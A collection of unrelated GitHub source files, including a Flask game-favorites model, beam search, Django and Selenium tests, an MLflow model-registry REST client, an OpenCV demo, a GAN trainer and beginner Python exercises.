def add_favorite_game(cls, data):
query = 'INSERT INTO users_favorite_games (user_id, atlas_game_id, atlas_game_name) VALUES (%(user_id)s, %(atlas_game_id)s, %(atlas_game_name)s);'
return MySQLConnection('find_players').query_db(query, data)
@classmethod
def is_favorite_game(cls, data):
is_favorite = False
query = 'SELECT * FROM users_favorite_games WHERE user_id = %(user_id)s AND atlas_game_id = %(atlas_game_id)s'
check_favorite = MySQLConnection('find_players').query_db(query, data)
if check_favorite:
is_favorite = True
return is_favorite
@classmethod
def get_favorite_games(cls, data):
query = 'SELECT * FROM users_favorite_games WHERE user_id=%(user_id)s;'
results = MySQLConnection('find_players').query_db(query, data)
favorite_games = []
for game in results:
favorite_games.append(cls(game))
return favorite_games
@classmethod
def remove_favorite_game(cls, data):
query = 'DELETE FROM users_favorite_games WHERE user_id = %(user_id)s AND atlas_game_id = %(atlas_game_id)s'
return MySQLConnection('find_players').query_db(query, data)
@classmethod
def add_owned_game(cls, data):
query = 'INSERT INTO users_own_games (user_id, atlas_game_id, atlas_game_name) VALUES (%(user_id)s, %(atlas_game_id)s, %(atlas_game_name)s);'
return MySQLConnection('find_players').query_db(query, data)
@classmethod
def get_owned_games(cls, data):
query = 'SELECT * FROM users_own_games WHERE user_id=%(user_id)s;'
results = MySQLConnection('find_players').query_db(query, data)
owned_games = []
for game in results:
owned_games.append(cls(game))
return owned_games
@classmethod
def is_owned_game(cls, data):
is_owned = False
query = 'SELECT * FROM users_own_games WHERE user_id = %(user_id)s AND atlas_game_id = %(atlas_game_id)s'
check_owned = MySQLConnection('find_players').query_db(query, data)
if check_owned:
is_owned = True
return is_owned
@classmethod
def remove_owned_game(cls, data):
query = "DELETE FROM users_own_games WHERE user_id = %(user_id)s AND atlas_game_id = %(atlas_game_id)s"
return MySQLConnection('find_players').query_db(query, data)
| aaroncourt/Find-Players | flask_app/models/game.py | game.py | py | 4,042 | python | en | code | 1 | github-code | 90 |
37780708119 | #Este código se puede utilizar usando heaps (colas de prioridad) para optimizar el uso en memoria
# y el tiempo de ejecución.
#
# Este programa al ordenar la lista en cada iteración tiene una complejidad de tiempo de: O(n*log(n))
# Al usar Heap, la complejidad es de: O(log(n))
def beam_search(graph, start, goal, heuristic_table, beam_width):
visited = set()
queue = [(0, [start])] # (cost, path)
while queue:
current_paths = []
# Obtener las 'beam_width' rutas con el menor costo en la cola
sorted_queue = sorted(queue, key=lambda x: x[0])
selected_paths = sorted_queue[:beam_width]
for cost, path in selected_paths:
queue.remove((cost, path))
current_node = path[-1]
if current_node == goal:
return path
if current_node not in visited:
visited.add(current_node)
for neighbor, edge_cost in graph.content[current_node]:
total_cost = cost + int(edge_cost) + int(heuristic_table[neighbor])
current_paths.append((total_cost, path + [neighbor]))
queue.extend(current_paths)
return None | HeinrichGomTag/Artificial-Intelligence-Projects | Informed-Search-Loyal-Mau/beam_search.py | beam_search.py | py | 1,197 | python | es | code | 0 | github-code | 90 |
35753160891 | #!/usr/bin/env python
from itertools import combinations
def gcd(x,y):
while y:
x,y=y,x%y
return x
n=int(input())
li=[]
for _ in range(n):
li=list(map(int,input().split()))
li=li[::-1]
del li[-1]
com=combinations(li,2)
res=0
for i in com:
res+=gcd(i[0],i[1])
print(res)
| hansojin/python | mathematics/bj9613.py | bj9613.py | py | 331 | python | en | code | 0 | github-code | 90 |
14585811899 | # -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
from django.core.exceptions import ImproperlyConfigured
from django.db import connections
from django.db.models.sql.constants import CURSOR, NO_RESULTS, SINGLE
from django.db.utils import OperationalError, ProgrammingError
from django.test.testcases import TestCase
from rest_models.backend.compiler import SQLCompiler
from rest_models.test import RestModelTestCase
from testapp.models import Pizza
class TestSqlCompiler(TestCase):
"""
test for coverage use. specials cases are not easy to trigger with queryset
"""
databases = ['default', 'api']
fixtures = ['data.json']
def get_compiler(self, queryset):
return SQLCompiler(queryset.query, connections['api'], 'api')
def test_no_result(self):
compiler = self.get_compiler(
Pizza.objects.all(),
)
self.assertEqual(
compiler.execute_sql(NO_RESULTS),
None
)
def test_no_result_type(self):
compiler = self.get_compiler(
Pizza.objects.all()
)
self.assertEqual(compiler.execute_sql(None), None)
def test_uniq_result_no_query(self):
compiler = self.get_compiler(
Pizza.objects.filter(pk=1).filter(pk=2)
)
self.assertEqual(compiler.execute_sql(SINGLE), None)
def test_no_result_no_query(self):
compiler = self.get_compiler(
Pizza.objects.filter(pk=1).filter(pk=2)
)
self.assertEqual(list(compiler.execute_sql()), [])
def test_get_cursor_query(self):
compiler = self.get_compiler(
Pizza.objects.filter(pk=1)
)
self.assertRaises(ProgrammingError, compiler.execute_sql, CURSOR)
class TestErrorResponseFormat(RestModelTestCase):
databases = ['default', 'api']
pizza_data = {
"cost": 2.08,
"to_date": "2016-11-20T08:46:02.016000",
"from_date": "2016-11-15",
"price": 10.0,
"id": 1,
"links": {
"toppings": "toppings/"
},
"name": "suprème",
"toppings": [
1,
2,
3,
4,
5
],
"menu": 1
}
rest_fixtures = {
'/oauth2/token/': [
{'data': {'scope': 'read write', 'access_token': 'HJKMe81faowKipJGKZSwg05LnfJmrU',
'token_type': 'Bearer', 'expires_in': 36000}}
],
'pizza': [
{
'data': {
'pizzas': [pizza_data]
}
}
],
}
database_rest_fixtures = {'api': rest_fixtures}
def test_remote_name_mismatch(self):
with self.mock_api('pizza', {'pazzi': []}, using='api'):
self.assertRaisesMessage(
ImproperlyConfigured,
'the response does not contains the result for pizzas',
list,
Pizza.objects.all()
)
with self.mock_api('pizza', {'pizzas': []}, using='api'):
self.assertEqual(len(list(Pizza.objects.all())), 0)
def test_remote_not_contains_id(self):
with self.mock_api('pizza', {'menus': [{}], 'pizzas': [self.pizza_data]}, using='api'):
self.assertRaisesMessage(
OperationalError,
'the response from the server does not contains the ID of the model.',
list,
Pizza.objects.all().select_related('menu')
)
| Yupeek/django-rest-models | rest_models/tests/tests_compilers.py | tests_compilers.py | py | 3,530 | python | en | code | 63 | github-code | 90 |
37045504301 | import time
import unittest
import sys
from selenium import webdriver
from selenium.webdriver import ActionChains
from POM_mainversion.login import *
from POM_mainversion.Detail_page import *
import os
sys.path.append(os.path.join(os.path.dirname(__file__), "...", "..."))
class TestGarden(unittest.TestCase):
@classmethod
def setUpClass(self):
self.driver = webdriver.Chrome(executable_path="C:/Users/voraw/Downloads/Compressed/webdriver/chromedriver/chromedriver")
self.driver.implicitly_wait(10)
self.driver.maximize_window()
def test_login_valid(self):
driver = self.driver
self.driver.get("https://top-upstream-client.mulberrysoft.com")
login = LoginPage(driver)
garden = Detail_Garden_Page(driver)
login.enter_username("demo004")
login.enter_password("598745")
login.click_login()
time.sleep(2)
login.click_interface()
time.sleep(2)
garden.into_garden()
time.sleep(2)
garden.upload_image_garden()
time.sleep(2)
scroll = driver.find_element_by_xpath("//ion-item[4]/ion-input/input")
action = ActionChains(driver)
action.move_to_element(scroll).perform()
garden.garden_enter_unit()
time.sleep(2)
garden.name_garden_input("eiei")
time.sleep(2)
garden.number_garden_input("555")
time.sleep(2)
garden.area_garden_input("8")
time.sleep(2)
scroll2 = driver.find_element_by_xpath("//ion-item[10]/ion-select")
action = ActionChains(driver)
action.move_to_element(scroll2).perform()
time.sleep(2)
garden.garden_enter_owner()
time.sleep(2)
garden.garden_enter_district()
time.sleep(2)
garden.garden_enter_status()
time.sleep(2)
scroll3 = driver.find_element_by_xpath("//form/ion-button")
action = ActionChains(driver)
action.move_to_element(scroll3).perform()
garden.garden_accept_submit()
time.sleep(2)
@classmethod
def tearDownClass(cls):
cls.driver.close()
cls.driver.quit()
print("Test Completed")
if __name__ == '__main__':
unittest.main()
| maxcrup007/Selenium_Webdriver_Python | POM_mainversion/TestCase/Detail_page/Garden/TC_001.py | TC_001.py | py | 2,520 | python | en | code | 0 | github-code | 90 |
39002366239 | import random
class House:
def __init__(self, x, baseColor, roofColor=[0.3, 0.3, 0.3]):
self.x = x
self.y = 360
self.sy = self.y
self.baseColor = baseColor
self.roofColor = roofColor
self.vx = random.randint(-5, 5)
self.vy = random.randint(0, 10)
self.my = random.randint(1, 10)
def draw(self, window):
window.drawRect(self.x, self.y, 40, 40, *self.baseColor)
window.drawTri(self.x - 5, self.y, self.x + 20, self.y - 20, self.x + 45, self.y, *self.roofColor)
self.drawSmoke(window, 20)
def drawSmoke(self, window, count):
for i in range(count):
window.drawCircle(self.x + self.vx, self.sy - self.vy, 10, .6, .6, .6, .25)
print("made a smoke")
def update(self, dt):
self.sy -= self.my * dt
if self.sy < self.y - 40:
self.sy = self.y
| madmulk9/ccircle | madison/something/house.py | house.py | py | 899 | python | en | code | 0 | github-code | 90 |
5254664658 | import unittest
import timeit
class ThreeSumBinarySearch:
def __init__(self, array):
self.array = array
self.array.sort()
self.n = len(self.array)
def count(self):
count = 0
for i in range(self.n):
for j in range(i+1, self.n):
val = (self.array[i] + self.array[j]) * -1
if self.find(j+1, self.n-1, val):
count += 1
return count
def find(self, lo, hi, key):
while (lo <= hi):
mid = lo + (hi - lo)/2
if key < self.array[mid]:
hi = mid -1
elif key > self.array[mid]:
lo = mid +1
else:
return True
return False
class ThreeSumBinarySearchTest(unittest.TestCase):
def test_count(self):
arr1 = [-3, -2, -1, 0, 1, 2, 3]
obj = ThreeSumBinarySearch(arr1)
self.assertEqual(obj.count(), 5)
arr2 = [3, 2, 1, 0, 1, 2, 3]
obj = ThreeSumBinarySearch(arr2)
self.assertEqual(obj.count(), 0)
if __name__ == '__main__':
setup = '''
from __main__ import ThreeSumBinarySearch
import random
array = random.sample(range(-1000, 1000), 100)
'''
print(max(timeit.repeat("ThreeSumBinarySearch(array).count()", setup= setup, number= 10)))
unittest.main() | mberlanda/algorithm-princeton | week_1/analysis_of_algorithms/three_sum_binary_search.py | three_sum_binary_search.py | py | 1,261 | python | en | code | 1 | github-code | 90 |
6797592090 | import numpy as np
from matplotlib.path import Path
# plane path
def make_plane(rot_ang):
# create plane dimensions
l = 1.
lw = 0.25*l
lt = 0.15*l
ln = l-lw-lt
w = 0.6*l
wt = 0.3*w
wn = 0.25*w
ww = 0.15*w
# create plane vertices
v1 = (0., l)
v2 = (wn, l-ln)
v3 = (w-wn, lt+0.55*lw)
v4 = (w, lt+lw)
v5 = (w, lt)
v6 = (0.6*wt, lt)
v7 = (wt, 0.)
v8 = (-wt, 0.)
v9 = (-0.6*wt, lt)
v10 = (-w, lt)
v11 = (-w, lt+lw)
v12 = (-w+wn, lt+0.55*lw)
v13 = (-wn, l-ln)
# create polygon path and rotate
verts = [v1, v2, v3, v4, v5, v6, v7, v8,
v9, v10, v11, v12, v13, v1]
xv = np.array([v[0] for v in verts])
yv = np.array([v[1] for v in verts])
xv = xv-np.mean(xv)
yv = yv-np.mean(yv)
xvr = xv*np.cos(rot_ang/180.*np.pi)-yv*np.sin(rot_ang/180.*np.pi)
yvr = xv*np.sin(rot_ang/180.*np.pi)+yv*np.cos(rot_ang/180.*np.pi)
np_verts = np.vstack((xvr, yvr)).T
pplane = Path(np_verts)
return pplane
| rskschrom/er2_mpl_marker | plane_path.py | plane_path.py | py | 1,030 | python | en | code | 0 | github-code | 90 |
33466671654 | import cv2 as cv
import numpy as np
# Load two images
img1 = cv.imread('photos/VanGogh-starry_night.jpg')
img2 = cv.imread('photos/star.png')
assert img1 is not None, "File 'VanGogh-starry_night.jpg' could not be read or does not exist"
assert img2 is not None, "File 'star.png' could not be read or does not exist"
# Create a ROI (region of interest)
rows, cols, channels = img2.shape
roi = img1[0:rows, 0:cols]
# Convert logo image to grayscale and create a binary mask
img2_gray = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)
ret, mask = cv.threshold(img2_gray, 10, 255, cv.THRESH_BINARY)
mask_inv = cv.bitwise_not(mask)
# Apply the mask to the ROI
img1_bg = cv.bitwise_and(roi, roi, mask=mask_inv)
# Take the region of logo from the logo image
img2_fg = cv.bitwise_and(img2, img2, mask=mask)
# Combine the foreground and background
dst = cv.add(img1_bg, img2_fg)
img1[0:rows, 0:cols] = dst
# Display the resulting image
cv.imshow('Result', img1)
cv.waitKey(0)
cv.destroyAllWindows()
| Sanidhanand/opencv | bitwiseOperations.py | bitwiseOperations.py | py | 1,020 | python | en | code | 0 | github-code | 90 |
29626540787 | #
# @lc app=leetcode id=43 lang=python
#
# [43] Multiply Strings
#
class Solution(object):
def multiply(self, num1, num2):
"""
:type num1: str
:type num2: str
:rtype: str
"""
m = len(num1)
n = len(num2)
res = [0 for _ in range(m + n)] # total digits
for i in range(m - 1, -1, -1):
for j in range(n - 1, -1, -1):
p1 = i + j + 1 # position
p2 = i + j # carry
cur = (ord(num1[i]) - ord('0')) * (ord(num2[j]) - ord('0'))
total = res[p1] + cur
res[p1] = total % 10
res[p2] += total // 10 # Note this is +=!!!!!!
res = ''.join(map(str, res))
res = res.lstrip('0')
return res if res else '0'
if __name__ == '__main__':
"""
需要自己实现一个乘法...
漂亮的图解 https://leetcode.com/problems/multiply-strings/discuss/17605/Easiest-JAVA-Solution-with-Graph-Explanation
"""
s = Solution()
print(s.multiply('0', '99'), 99 * 99)
| zhch-sun/leetcode_szc | 43.multiply-strings.py | 43.multiply-strings.py | py | 1,066 | python | en | code | 0 | github-code | 90 |
18325829269 | N=int(input())
bandera=False
for i in range(10):
for j in range(10):
producto=i*j
if producto==N:
bandera=True
if bandera==True:
print("Yes")
else:
print("No") | Aasthaengg/IBMdataset | Python_codes/p02880/s166434728.py | s166434728.py | py | 179 | python | es | code | 0 | github-code | 90 |
18332815199 | # ワ―シャルフロイドで解くよ
def main():
import sys
input = sys.stdin.readline # 1行ごとの入力を繰り返し扱う場合の高速化
N, M, L = map(int, input().split())
# distanceを格納(未到達は無限遠として初期化)
d = [[10 ** 12] * N for _ in range(N)]
# input-edges
for i in range(M):
a, b, c = map(int, input().split())
if L >= c: # 距離がLより大きいのは無視
d[a - 1][b - 1] = d[b - 1][a - 1] = c
for i in range(N):
d[i][i] = 0 # 自己ループ無
# ワ―シャルフロイド法適用
# 町間の最短距離を一度求める。
for k in range(N):
for i in range(N):
for j in range(N):
d[i][j] = min(d[i][k] + d[k][j], d[i][j])
# 先ほど求めた町間の内、最短距離がL以下のものを距離1で結ぶ。
edge = [[10 ** 12] * N for _ in range(N)]
for i in range(N):
for j in range(N):
if d[i][j] <= L:
edge[i][j] = 1
# もう一度ワ―シャルフロイド法適用
for k in range(N):
for i in range(N):
for j in range(N):
edge[i][j] = min(edge[i][k] + edge[k][j], edge[i][j])
# input-query
Q = int(input())
for _ in range(Q):
s, t = map(int, input().split())
if edge[s - 1][t - 1] >= 10 ** 12:
print(-1)
else:
print(edge[s - 1][t - 1] - 1) # 最初に燃料Lがある分、マイナス1をする。
if __name__ == "__main__":
main() | Aasthaengg/IBMdataset | Python_codes/p02889/s846808995.py | s846808995.py | py | 1,603 | python | ja | code | 0 | github-code | 90 |
2903854670 | import os
import torch
import torch.nn as nn
import datetime
import torch.nn.functional as F
import lpips
import numpy as np
from tqdm.auto import tqdm
from torchvision import utils as vutils
from ..definitions.textureLoss import TextureLoss
def save_imgs(imgs, basename):
try:
filename = basename + '.jpg'
vutils.save_image(imgs.detach().cpu(), filename, nrow=8, normalize=True, pad_value=0.3)
except Exception as e:
error = Exception(f'Error: {__file__}: save_imgs: {str(e)}')
raise error
class GanTrainer():
def __init__(self, model, optimizer_d, optimizer_g, chk_name, patience=1, min_delta=0):
self.model = model
self.d_optimizer = optimizer_d
self.g_optimizer = optimizer_g
self.chk_name = chk_name
self.patience = patience
self.min_validation_loss = float('inf')
self.min_delta = min_delta
self.counter = 0
self.adversarial_loss = nn.BCELoss()
self.pixelwise_loss = nn.L1Loss()
self.texture_loss = TextureLoss()
self.device = torch.device('cpu')
self.loss_fn_alex = lpips.LPIPS(net='vgg')
def save_model(self, path, model_name):
'''
Method used for save the model.
'''
date = datetime.today().strftime('%Y-%m-%d')
torch.save(self.model.state_dict(),
os.path.join(path, model_name + "__" + self.chk_name + "__" + date + '.pt'))
def to(self, device):
self.device = device
self.adversarial_loss.to(device)
self.pixelwise_loss.to(device)
self.loss_fn_alex.to(device)
def _early_stop(self, validation_loss):
if validation_loss < self.min_validation_loss:
self.min_validation_loss = validation_loss
self.counter = 0
elif validation_loss > (self.min_validation_loss + self.min_delta):
self.counter += 1
if self.counter >= self.patience:
return True
return False
def _exec(self, input_b, real_b, enable_discriminator, enable_generator):
D = self.model.D
batch_size = len(input_b)
input_b = input_b.to(self.device)
real_b = real_b.to(self.device)
r = self.model.get_resolution()
real_b = real_b[..., (r-32):((2*r)-32), 0:r]
size = int((self.model.get_resolution() / 8 - 1))
lab_real = torch.full((batch_size, 1, size, size), 0.9).to(self.device)
lab_fake = torch.full((batch_size, 1, size, size), 0.1).to(self.device)
if (enable_generator):
with torch.enable_grad():
prediction = self.model(input_b)
else:
with torch.no_grad():
prediction = self.model(input_b)
if (enable_discriminator):
with torch.enable_grad():
D_real = D(real_b)
D_fake = D(prediction)
else:
with torch.no_grad():
D_real = D(real_b)
D_fake = D(prediction)
lossD_real = self.adversarial_loss(torch.sigmoid(D_real), lab_real)
lossD_fake = self.adversarial_loss(torch.sigmoid(D_fake), lab_fake)
lossD = lossD_real + lossD_fake
lossG_adv = self.adversarial_loss(torch.sigmoid(D_fake), lab_real)
pixelwise_loss_value = self.pixelwise_loss(prediction, real_b)
#pixelwise_loss_value = self.loss_fn_alex(prediction, real_b).mean()
lossG = 0.1 * lossG_adv + pixelwise_loss_value
return lossD, lossG, prediction
def evaluate(self, validation_dataset):
valid_loss = 0.0
self.model.eval()
with torch.no_grad():
batch_pbar = tqdm(validation_dataset, desc = "Validation - Batch", leave = False)
for batch in batch_pbar:
input_b = batch['inputs']
real_b = batch['reals']
batch_size = len(input_b)
input_b = input_b.to(self.device)
real_b = real_b.to(self.device)
r = self.model.get_resolution()
real_b = real_b[..., (r-32):((2*r)-32), 0:r]
prediction = self.model(input_b)
#pixelwise_loss_value = self.pixelwise_loss(prediction, real_b)
#lossG = pixelwise_loss_value
lossG = self.loss_fn_alex(real_b, prediction)
lossG = lossG.mean()
valid_loss += lossG.tolist()
batch_pbar.set_postfix({'validation_loss': lossG.tolist(), 'patience': self.counter})
avg_valid_loss = valid_loss / len(validation_dataset)
return avg_valid_loss
def _train(self, input_b, real_b, d, g):
enable_d = d
if enable_d:
self.model.train_discriminator()
self.d_optimizer.zero_grad()
enable_g = g
if enable_g:
self.model.train_generator()
self.g_optimizer.zero_grad()
lossD, lossG, prediction = self._exec(input_b, real_b, enable_d, enable_g)
if enable_d:
lossD.backward()
self.d_optimizer.step()
if enable_g:
lossG.backward()
self.g_optimizer.step()
return lossD, lossG, prediction
def train(self, train_dataset, validation_dataset, save_folder, offset = 0, mode = ['d', 'g'], epochs=200):
# ciclo sulle epoche per ogni batch
valid_loss = 1000.0
self.counter = 0
# List of training losses
train_d_losses = []
train_g_losses = []
# List of training losses
valid_losses = []
valid_loss = 1.0
lossD = 1.1
for epoch in tqdm(range(epochs), desc = "Epochs", leave = False):
epoch_d_loss = 0
epoch_g_loss = 0
if epoch < offset:
d = True
g = False
else:
flag = mode[(epoch - offset) % len(mode)]
d = flag == 'd' or flag == 'b'
g = flag == 'g'or flag == 'b'
if lossD <= 1.05:
d = False
g = True
batch_pbar = tqdm(train_dataset, desc = "Training - Batch", leave = True)
for batch in batch_pbar:
input_b = batch['inputs']
real_b = batch['reals']
self.model.eval_generator()
self.model.eval_discriminator()
lossD, lossG, prediction = self._train(input_b, real_b, d, g)
epoch_d_loss += lossD.tolist()
epoch_g_loss += lossG.tolist()
batch_pbar.set_postfix({'v': self.min_validation_loss, 'd': lossD.item(), 'g': lossG.item(), 'p': self.counter})
avg_epoch_d_loss = epoch_d_loss / len(train_dataset)
train_d_losses.append(avg_epoch_d_loss)
avg_epoch_g_loss = epoch_g_loss / len(train_dataset)
train_g_losses.append(avg_epoch_g_loss)
print('e_{}: D(x)={:.4f} D(G(z))={:.4f}'.format(epoch, avg_epoch_d_loss, avg_epoch_g_loss))
if g:
# validation loss
valid_loss = self.evaluate(validation_dataset)
# print('val_loss', valid_loss)
valid_losses.append(valid_loss)
print('V(x):{}'.format(valid_loss))
if self._early_stop(valid_loss):
#self.save_model('GAN')
break
#saving
save_imgs(prediction, os.path.join(save_folder, "train_e_{}".format(epoch)))
self.model.save(
os.path.join(save_folder, "discriminator_{}_{}".format(self.model.get_resolution(), epoch)),
os.path.join(save_folder, "generator_{}_{}".format(self.model.get_resolution(), epoch)),
)
try:
np.savez(os.path.join(save_folder, "loss_{}".format(epoch)), array1=train_d_losses, array2=train_g_losses, array3=valid_losses)
except Exception as e:
print(e)
return train_d_losses, train_g_losses, valid_losses
| paolacarboni/project-vision-perception | srcs/textAwareMultiGan/definitions/trainer.py | trainer.py | py | 8,088 | python | en | code | 0 | github-code | 90 |
12322045085 | import logging
from mlflow.entities.model_registry import RegisteredModel, ModelVersion
from mlflow.protos.model_registry_pb2 import ModelRegistryService, CreateRegisteredModel, \
UpdateRegisteredModel, DeleteRegisteredModel, ListRegisteredModels, \
GetLatestVersions, CreateModelVersion, UpdateModelVersion, \
DeleteModelVersion, GetModelVersionDownloadUri, SearchModelVersions, \
RenameRegisteredModel, GetRegisteredModel, GetModelVersion, TransitionModelVersionStage
from mlflow.store.entities.paged_list import PagedList
from mlflow.store.model_registry.abstract_store import AbstractStore
from mlflow.utils.proto_json_utils import message_to_json
from mlflow.utils.rest_utils import call_endpoint, extract_api_info_for_service
_PATH_PREFIX = "/api/2.0"
_METHOD_TO_INFO = extract_api_info_for_service(ModelRegistryService, _PATH_PREFIX)
_logger = logging.getLogger(__name__)
class RestStore(AbstractStore):
"""
Note:: Experimental: This entity may change or be removed in a future release without warning.
Client for a remote model registry server accessed via REST API calls
:param get_host_creds: Method to be invoked prior to every REST request to get the
:py:class:`mlflow.rest_utils.MlflowHostCreds` for the request. Note that this
is a function so that we can obtain fresh credentials in the case of expiry.
"""
def __init__(self, get_host_creds):
super(RestStore, self).__init__()
self.get_host_creds = get_host_creds
def _call_endpoint(self, api, json_body):
endpoint, method = _METHOD_TO_INFO[api]
response_proto = api.Response()
return call_endpoint(self.get_host_creds(), endpoint, method, json_body, response_proto)
# CRUD API for RegisteredModel objects
def create_registered_model(self, name):
"""
Create a new registered model in backend store.
:param name: Name of the new model. This is expected to be unique in the backend store.
:return: A single object of :py:class:`mlflow.entities.model_registry.RegisteredModel`
created in the backend.
"""
req_body = message_to_json(CreateRegisteredModel(name=name))
response_proto = self._call_endpoint(CreateRegisteredModel, req_body)
return RegisteredModel.from_proto(response_proto.registered_model)
def update_registered_model(self, name, description):
"""
Updates metadata for RegisteredModel entity.
:param name: :py:string: Registered model name.
:param description: New model description.
:return: A single updated :py:class:`mlflow.entities.model_registry.RegisteredModel` object.
"""
req_body = message_to_json(UpdateRegisteredModel(
name=name, description=description))
response_proto = self._call_endpoint(UpdateRegisteredModel, req_body)
return RegisteredModel.from_proto(response_proto.registered_model)
def rename_registered_model(self, name, new_name):
"""
Renames the registered model.
:param name: Registered model name.
:param new_name: New proposed name for the registered model.
:return: A single updated :py:class:`mlflow.entities.model_registry.RegisteredModel` object.
"""
req_body = message_to_json(RenameRegisteredModel(
name=name, new_name=new_name))
response_proto = self._call_endpoint(RenameRegisteredModel, req_body)
return RegisteredModel.from_proto(response_proto.registered_model)
def delete_registered_model(self, name):
"""
Delete registered model.
Backend raises exception if a registered model with given name does not exist.
:param registered_model: :py:class:`mlflow.entities.model_registry.RegisteredModel` object.
:return: None
"""
req_body = message_to_json(DeleteRegisteredModel(
name=name))
self._call_endpoint(DeleteRegisteredModel, req_body)
def list_registered_models(self):
"""
List of all registered models.
:return: List of :py:class:`mlflow.entities.model_registry.RegisteredModel` objects.
"""
req_body = message_to_json(ListRegisteredModels())
response_proto = self._call_endpoint(ListRegisteredModels, req_body)
return [RegisteredModel.from_proto(registered_model)
for registered_model in response_proto.registered_models]
def get_registered_model(self, name):
"""
:param name: Registered model name.
:return: A single :py:class:`mlflow.entities.model_registry.RegisteredModel` object.
"""
req_body = message_to_json(GetRegisteredModel(name=name))
response_proto = self._call_endpoint(GetRegisteredModel, req_body)
return RegisteredModel.from_proto(response_proto.registered_model)
def get_latest_versions(self, name, stages=None):
"""
Latest version models for each requested stage. If no ``stages`` argument is provided,
returns the latest version for each stage.
:param name: Registered model name.
:param stages: List of desired stages. If input list is None, return latest versions for
for 'Staging' and 'Production' stages.
:return: List of :py:class:`mlflow.entities.model_registry.ModelVersion` objects.
"""
req_body = message_to_json(GetLatestVersions(name=name, stages=stages))
response_proto = self._call_endpoint(GetLatestVersions, req_body)
return [ModelVersion.from_proto(model_version)
for model_version in response_proto.model_versions]
# CRUD API for ModelVersion objects
def create_model_version(self, name, source, run_id):
"""
Create a new model version from given source and run ID.
:param name: Registered model name.
:param source: Source path where the MLflow model is stored.
:param run_id: Run ID from MLflow tracking server that generated the model
:return: A single object of :py:class:`mlflow.entities.model_registry.ModelVersion`
created in the backend.
"""
req_body = message_to_json(CreateModelVersion(name=name, source=source, run_id=run_id))
response_proto = self._call_endpoint(CreateModelVersion, req_body)
return ModelVersion.from_proto(response_proto.model_version)
def transition_model_version_stage(self, name, version, stage,
archive_existing_versions):
"""
Update model version stage.
:param name: Registered model name.
:param version: Registered model version.
:param new_stage: New desired stage for this model version.
:param archive_existing_versions: If this flag is set, all existing model
versions in the stage will be atomically moved to the "archived" stage.
:return: A single :py:class:`mlflow.entities.model_registry.ModelVersion` object.
"""
req_body = message_to_json(TransitionModelVersionStage(
name=name, version=str(version),
stage=stage,
archive_existing_versions=archive_existing_versions))
response_proto = self._call_endpoint(TransitionModelVersionStage, req_body)
return ModelVersion.from_proto(response_proto.model_version)
def update_model_version(self, name, version, description):
"""
Update metadata associated with a model version in backend.
:param name: Registered model name.
:param version: Registered model version.
:param description: New description.
:return: None.
"""
req_body = message_to_json(UpdateModelVersion(name=name, version=str(version),
description=description))
response_proto = self._call_endpoint(UpdateModelVersion, req_body)
return ModelVersion.from_proto(response_proto.model_version)
def delete_model_version(self, name, version):
"""
Delete model version in backend.
:param name: Registered model name.
:param version: Registered model version.
:return: None
"""
req_body = message_to_json(DeleteModelVersion(name=name, version=str(version)))
self._call_endpoint(DeleteModelVersion, req_body)
def get_model_version(self, name, version):
"""
:param name: Registered model name.
:param version: Registered model version.
:return: A single :py:class:`mlflow.entities.model_registry.ModelVersion` object.
"""
req_body = message_to_json(GetModelVersion(name=name, version=str(version)))
response_proto = self._call_endpoint(GetModelVersion, req_body)
return ModelVersion.from_proto(response_proto.model_version)
def get_model_version_download_uri(self, name, version):
"""
Get the download location in Model Registry for this model version.
:param name: Registered model name.
:param version: Registered model version.
:return: A single URI location that allows reads for downloading.
"""
req_body = message_to_json(GetModelVersionDownloadUri(name=name, version=str(version)))
response_proto = self._call_endpoint(GetModelVersionDownloadUri, req_body)
return response_proto.artifact_uri
def search_model_versions(self, filter_string):
"""
Search for model versions in backend that satisfy the filter criteria.
:param filter_string: A filter string expression. Currently supports a single filter
condition either name of model like ``name = 'model_name'`` or
``run_id = '...'``.
:return: PagedList of :py:class:`mlflow.entities.model_registry.ModelVersion`
objects.
"""
req_body = message_to_json(SearchModelVersions(filter=filter_string))
response_proto = self._call_endpoint(SearchModelVersions, req_body)
model_versions = [ModelVersion.from_proto(mvd)
for mvd in response_proto.model_versions]
return PagedList(model_versions, None)
| castorfou/data-scientist-skills | python-sandbox/mlflow/mlflow/store/model_registry/rest_store.py | rest_store.py | py | 10,288 | python | en | code | 5 | github-code | 90 |
30684501649 | n, m = map(int, input().split())
list = []
for _ in range(n):
list.append(int(input()))
start = 1
end = max(list)
result = 0
while start <= end:
total = 0
mid = (start + end) // 2
for item in list:
total += item // mid
if total < m:
end = mid - 1
else:
result = mid
start = mid + 1
print(result)
| Hajin74/Problem_Solving | 백준/Silver/1654. 랜선 자르기/랜선 자르기.py | 랜선 자르기.py | py | 364 | python | en | code | 0 | github-code | 90 |
20146044665 | import pytest
from typing import List
class Solution:
def findMaxConsecutiveOnes(self, nums: List[int]) -> int:
if not nums:
return 0
count = 0
max_count = 0
for each in nums:
if each == 1:
count += 1
else:
max_count = count if count > max_count else max_count
count = 0
max_count = count if count > max_count else max_count
return max_count
test_data_set = [
]
@pytest.mark.parametrize('', test_data_set)
def test_solution():
solution = Solution()
| theodoresi/leetcode_solutions | python_version/485_max_consecutive_ones/max_consecutive_ones.py | max_consecutive_ones.py | py | 623 | python | en | code | 0 | github-code | 90 |
72452754218 | '''
递归函数
明确递归结束的条件
优点:写法简洁
缺点:效率不高
'''
# 死递归
# def my_function(x):
# print(x)
# my_function(x+1)
#
# my_function(1)
# 阶乘计算
def jiechen_func(x):
if(x==1):
return x
else:
return x*jiechen_func(x-1)
result = jiechen_func(5)
print(result)
'''
__name__
'''
def my_func():
print(__name__)
my_func()
if __name__ == "__main__":
print("这是函数的入口") | Fking1/studyPython | day8/recursive.py | recursive.py | py | 487 | python | en | code | 1 | github-code | 90 |
5833132865 | # 121
user = input("알파벳 입력: ")
if user.islower():
print(user.upper())
else:
print(user.lower())
# 122
score = input("점수 입력: ")
score = int(score)
if 81 <= score <= 100:
print("grade is A")
elif 61 <= score <= 80:
print("grade is B")
elif 41 <= score <= 60:
print("grade is C")
elif 21 <= score <= 40:
print("grade is D")
else:
print("grade is E")
# 123
환율 = {"달러": 1167,
"엔": 1.096,
"유로": 1268,
"위안": 171}
money = input("입력: ")
num, currency = money.split()
print(float(num) * 환율[currency], "원")
# 124
num1 = input("input 1: ")
num2 = input("input 2: ")
num3 = input("input 3: ")
num1 = int(num1)
num2 = int(num2)
num3 = int(num3)
a = [num1, num2, num3]
print(max(a))
# 125
number = input("휴대폰 번호 입력: ")
